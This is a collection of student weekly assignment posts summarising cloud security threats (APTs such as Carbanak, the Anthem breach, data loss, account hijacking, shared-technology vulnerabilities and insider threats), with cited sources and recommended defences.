Week 11 Assignment

Advanced Persistent Threats (APTs) are a parasitical form of cyberattack that infiltrates systems to establish a foothold in the computing infrastructure of target companies from which they smuggle data and intellectual property (CSA). APTs act stealthy over extended periods of time and even adapt to the security measures intended to defend against them. Common points of entry are spear fishing, direct hacking attacks, USB devices preloaded with malicious code, compromised third-party networks, etc. Once in place APTs blend in with normal traffic and move through data center networks undetected.

“Carbanak, a major advanced persistent threat (APT) attack against financial institutions around the world, may be considered the largest cyberheist to date… Unlike the usual cybercriminal method of stealing consumer credentials or compromising individual online banking sessions with malware, the brazen Carbanak gang targeted banks’ internal systems and operations, resulting in a multichannel robbery that averaged $8 million per bank” (Kessem, L. 2015).  

According to the article the main factor that let attackers cause such damage was inadequate security controls. Internal core systems were not well protected since banks didn’t expect an attack from within. The heist started out slow with initial infiltration facilitated by spear fishing emails and exploit-laden attachments that compromised employee endpoints with malware.

Although APT attacks can be difficult to detect and eliminate, some can be stopped with proactive security measures. It is critical that users be educated to recognize and handle social engineering techniques, therefore awareness programs should be regularly reinforced. IT departments should be aware of the latest advanced attacks. Defending against APTs may require more advanced security controls, process management, incident response plans and IT staff training, which leads to increased security budgets. Organizations should weigh these costs against the potential economic damage inflicted by successful APT attacks.

Resources:

Kessem, L. (2015, February 23), Carbanak: How Would You Have Stopped a $1 Billion APT Attack?, retrieved from https://securityintelligence.com/carbanak-how-would-you-have-stopped-a-1-billion-apt-attack/

The Treacherous 12 Cloud Computing Top Threats in 2016, (February 2016), prepared by the Cloud Security Alliance, retrieved from https://downloads.cloudsecurityalliance.org/assets/research/top-threats/Treacherous-12_Cloud-Computing_Top-Threats.pdf

Week 10 Assignment

On January 29^th 2015, the health insurance company Anthem, Inc. discovered that hackers have gained unauthorized access to Anthem’s IT systems and nearly 80 million records containing Personally Identifiable Information (PII) were stolen. The hackers used phishing attacks to obtain network credentials of at least five employees with high level IT access. Data from the attack is expected to be sold on the black market.

Anthem’s breach was the result of insufficient identity, credential and access management, which is also a top concern in cloud computing environments. Data breaches can occur due to the lack of scalable identity access management systems, failure to use multifactor authentication, weak passwords use, and a lack of ongoing automated rotation of cryptographic keys, passwords and certificates (CSA, 2016). There are several factors that allowed for the success of the attack on Anthem – the data was not encrypted, too many of Anthem’s employees might have had too much access to the system, multifactor authentication was not deployed.

Identity systems must scale to support the lifecycle management for millions of users, including immediate de-provisioning of accounts upon job termination or role change.

Credentials and cryptographic keys should not be embedded in source code or contained in public-facing repositories such as GitHub. Keys need to be well protected and rotated periodically, a secured public key infrastructure (PKI) should be in place to ensure proper key management.

Multifactor authentication systems such as smart cards, one-time passwords (OTP), phone-based authentication, etc. are required in cloud environments. In case of legacy systems that use passwords alone, a policy should be implemented to enforce strong password creation and define password rotation.

Organizations planning to federate identity with a cloud provider need to understand the security processes, infrastructure and segmentation between customers implemented by the provider to protect the identity platform. Organizations must consider the trade-off of centralizing identity against the risk of having that single repository become a target of high interest to attackers.

Resources:

Hiltzik, M., (2015, March 6), Anthem is warning consumers about its huge data breach. Here's a translation., retrieved from http://www.latimes.com/business/la-fi-mh-anthem-is-warning-consumers-20150306-column.html

The Treacherous 12 Cloud Computing Top Threats in 2016, (February 2016), prepared by the Cloud Security Alliance, retrieved from https://downloads.cloudsecurityalliance.org/assets/research/top-threats/Treacherous-12_Cloud-Computing_Top-Threats.pdf

Rashid, F., (2016, March 11), The dirty dozen: 12 cloud security threats, retrieved from http://www.infoworld.com/article/3041078/security/the-dirty-dozen-12-cloud-security-threats.html

Week 9 Assignment

The risk of data breach is not unique to cloud computing, but it remains a top security concern for cloud customers. A data breach is an incident in which sensitive, protected, or confidential information is released, viewed, stolen or used by an individual who is not authorized to do so. Cloud environments are exposed to the same threats as traditional corporate networks, providing new avenues of attack due to the high accessibility and shared resources. The vast amount of data cloud providers host makes them a very attractive target.

A data breach can be the result of human error, application vulnerabilities or poor security practices. It may involve personal health information, financial information, personally identifiable information (PII), trade secrets, intellectual property or any other information not intended for public release.

The extent of the breach depends on the sensitivity of the data exposed. When a data breach occurs companies may face large fines, lawsuits or criminal charges. There are also costs associated with investigations, customer notification and legal services. Indirect effects such as brand damage and loss of business can have even more devastating impact on the organization.

In 2015 the antivirus firm BitDefender suffered a security breach, involving stolen usernames and passwords, due to a security vulnerability in its public cloud application hosted on AWS. The hacker responsible demanded a ransom of $15,000. The company was quick to resolve the issue and put additional security measures in place to prevent future reoccurrence. As an extra precaution, a password reset notice was sent to all potentially affected customers.

Cloud providers typically have good security controls set up for their environments, but customers are ultimately responsible for protecting their data in the cloud. An effective security program should be implemented, as well as multifactor authentication and encryption.

Resources:

The Treacherous 12 Cloud Computing Top Threats in 2016, (February 2016), prepared by the Cloud Security Alliance, retrieved from https://downloads.cloudsecurityalliance.org/assets/research/top-threats/Treacherous-12_Cloud-Computing_Top-Threats.pdf

Rashid, F., (2016, March 11), The dirty dozen: 12 cloud security threats, retrieved from http://www.infoworld.com/article/3041078/security/the-dirty-dozen-12-cloud-security-threats.html

Goldman, J., (2015, August 6), Bitdefender Acknowledges Data Breach, retrieved from http://www.esecurityplanet.com/network-security/bitdefender-acknowledges-data-breach.html

Week 8 Assignment

Permanent data loss is still one of the biggest fears that organizations face when opting for cloud services. Hackers would deliberately delete cloud data to harm businesses and ruin cloud providers’ reputation. Cloud data centers are also as vulnerable to natural disasters as any other facility.

Preventing data loss is a shared responsibility and cloud providers recommend distributing data and applications across multiple zones for added protection. Data backups are essential, as well as off-site data storage. When it comes to customer’s responsibilities – if encrypting data before uploading it to the cloud, then careful measures should be taken to protect the encryption key. Once the key is lost, so is the data.

On April 21^st 2011 Amazon experienced a massive service outage, causing service disruption and approximately 11 hours of historical data wasn’t recoverable and appeared as small gaps in the timeline. The root cause was a mistake made by Amazon’s engineers that triggered a cascade of other bugs and glitches. You can find a detailed description of the incident here.

There are compliance policies in place on how long organizations must retain documents and audit records. Losing such data can have serious consequences. Providers and cloud customers should take adequate measures to back up data and follow the best practices in business continuity and data recovery.

Resources:

Rashid, F., (2016, March 11), The dirty dozen: 12 cloud security threats, retrieved from http://www.infoworld.com/article/3041078/security/the-dirty-dozen-12-cloud-security-threats.html

Goldman, D., (2011, April 29), Amazon explains its cloud disaster, retrieved from http://money.cnn.com/2011/04/29/technology/amazon_apology/

Blodget, H., (2011, April 28), Amazon's Cloud Crash Disaster Permanently Destroyed Many Customers' Data, retrieved from http://www.businessinsider.com/amazon-lost-data-2011-4

Week 7 Assignment

The focus of this week’s post will be Account Hijacking in cloud environment. So what is Account Hijacking? An article by Digital Guardian describes it as “a process in which an individual or organization’s cloud account is stolen or hijacked by an attacker”. The stolen account information is later used to conduct malicious or unauthorized activity. The cloud environment is especially vulnerable to potential attacks of this sort, because of the huge amount of data stored in one place and the multiple accounts sharing resources across the network.

An example of Account Hijacking attack happened on April 20^th 2010 when cross-site scripting (XSS) was used to steal session IDs from Amazon Wireless customers. Session IDs are used to grant users access to their online accounts after they enter their password. It took the security team 12 hours to fix the bug, after it was first brought up to their attention.

Account hijacking attacks can damage an organization’s reputation and integrity when confidential data is leaked or lost, causing significant cost to businesses or their customers. Experts suggest the following steps to protect the data in the cloud: strong authentication for cloud app users, data is being backed up in the event of data loss, restriction of the IP addresses allowed to access cloud applications, multi-factor authentication and data encryption before it is sent to the cloud.

Resources:

Lord, N., (2015, September 28), What is Cloud Account Hijacking?,  retrieved from https://digitalguardian.com/blog/what-cloud-account-hijacking

Goodin, D., (2010, April 20), Amazon purges account hijacking threat from site, retrieved from http://www.theregister.co.uk/2010/04/20/amazon_website_treat/

Week 6 Assignment

For this week’s post I am going to look at the shared technology vulnerabilities as a security concern to cloud computing.

Cloud providers deliver services by sharing infrastructure, platform and applications. One of the essential characteristics of the cloud is resource pooling – resources that are used to provide the cloud service are realized, using a homogeneous infrastructure that is shared between all service users. The underlying components of the infrastructure, supporting the cloud, may not have been designed with strong isolation properties that are needed for IaaS, PaaS and SaaS. This can lead to shared technology vulnerabilities that can be exploited in all service models. The impact of a compromised piece of shared technology can be devastating and potentially affect the entire cloud. Resource pooling enables several customers to share certain network infrastructure components, vulnerabilities in a DNS server, DHCP and IP protocols might cause a network-based cross-tenant attack.

To mitigate the risks of shared technology vulnerabilities, multifactor authentication on all hosts should be implemented, along with Host-based Intrusion Detection System (HIDS) and Network-based Intrusion Detection System (NIDS). A defense in-depth strategy can be used for security enforcement and monitoring. Another point to mention is the partnership between the cloud provider and the customer – the security of the cloud is a shared responsibility and both sides need to take preventative actions to protect the infrastructure, services and data.

Resources:

The Treacherous 12 Cloud Computing Top Threats in 2016, (February 2016), prepared by the Cloud Security Alliance, retrieved from https://downloads.cloudsecurityalliance.org/assets/research/top-threats/Treacherous-12_Cloud-Computing_Top-Threats.pdf

Grobauer, B., Walloscheck, T., Stöcker, E., (2011, August 15), Understanding Cloud Computing Vulnerabilities, retrieved from https://www.infoq.com/articles/ieee-cloud-computing-vulnerabilities

Ma, Joy, (2015, December 14), Top 10 Security Concerns for Cloud-Based Services, retrieved from https://www.incapsula.com/blog/top-10-cloud-security-concerns.html

Week 5 Assignment

One of the serious concerns when it comes to cloud computing security is the malicious insider threat.  According to CERT a malicious insider is a ”current or former employee, contractor, or other business partner who has or had authorized access to an organizations network, system or data and intentionally exceeded or misused that access in a manner that negatively affected the confidentiality, integrity, or availability of the organizations information or information systems.”

Malicious insiders can have an increasing level of access to critical systems from IaaS to PaaS and SaaS but despite the concern cloud computing use continues to grow. There are three types of cloud-related insider threats:

• ·         Rogue Administrator – This administrator is employed by the cloud and the motivation behind the attack is often financial , resulting in theft of sensitive information, loss of confidentiality and integrity
• ·         Insider within the Organization, who exploits vulnerabilities exposed by the use of cloud services. This is often enabled by the differences in security policies or access control between the cloud provider and the organization.
• ·         Insider, who uses cloud services to carry out an attack on his own employer. The difference here is that the insider uses the cloud as a tool to attack targeted systems or data that are not necessarily associated with the cloud-based systems.

There are some countermeasures that both organizations and providers should consider. For the client side IDS/IPS mechanisms may be implemented along with cryptographic techniques to protect the confidentiality and integrity of their data. Some steps that the provider can take to minimize the risk of an insider threat are: separation of duties, logging user and administrator actions, legal bindings, insider detection models, anomaly detection, and multi-factor authentication.

Cloud computing offers business efficiency improvement but also provides new possibilities for insider attacks. In order to protect themselves, organizations need to be aware of the vulnerabilities related to cloud computing services and the availability they provide to employees.

Resources:

Claycomb, William & Nicoll, Alex, (n.d.), Insider Threats to Cloud Computing: Directions for New Research Challenges, retrieved from http://resources.sei.cmu.edu/asset_files/WhitePaper/2012_019_001_52385.pdf

Miltiadis Kandias, Nikos Virvilis, Dimitris Gritzalis, (2011), The Insider Threat in Cloud Computing, retrieved from https://www.infosec.aueb.gr/Publications/CRITISCloud%20Insider.pdf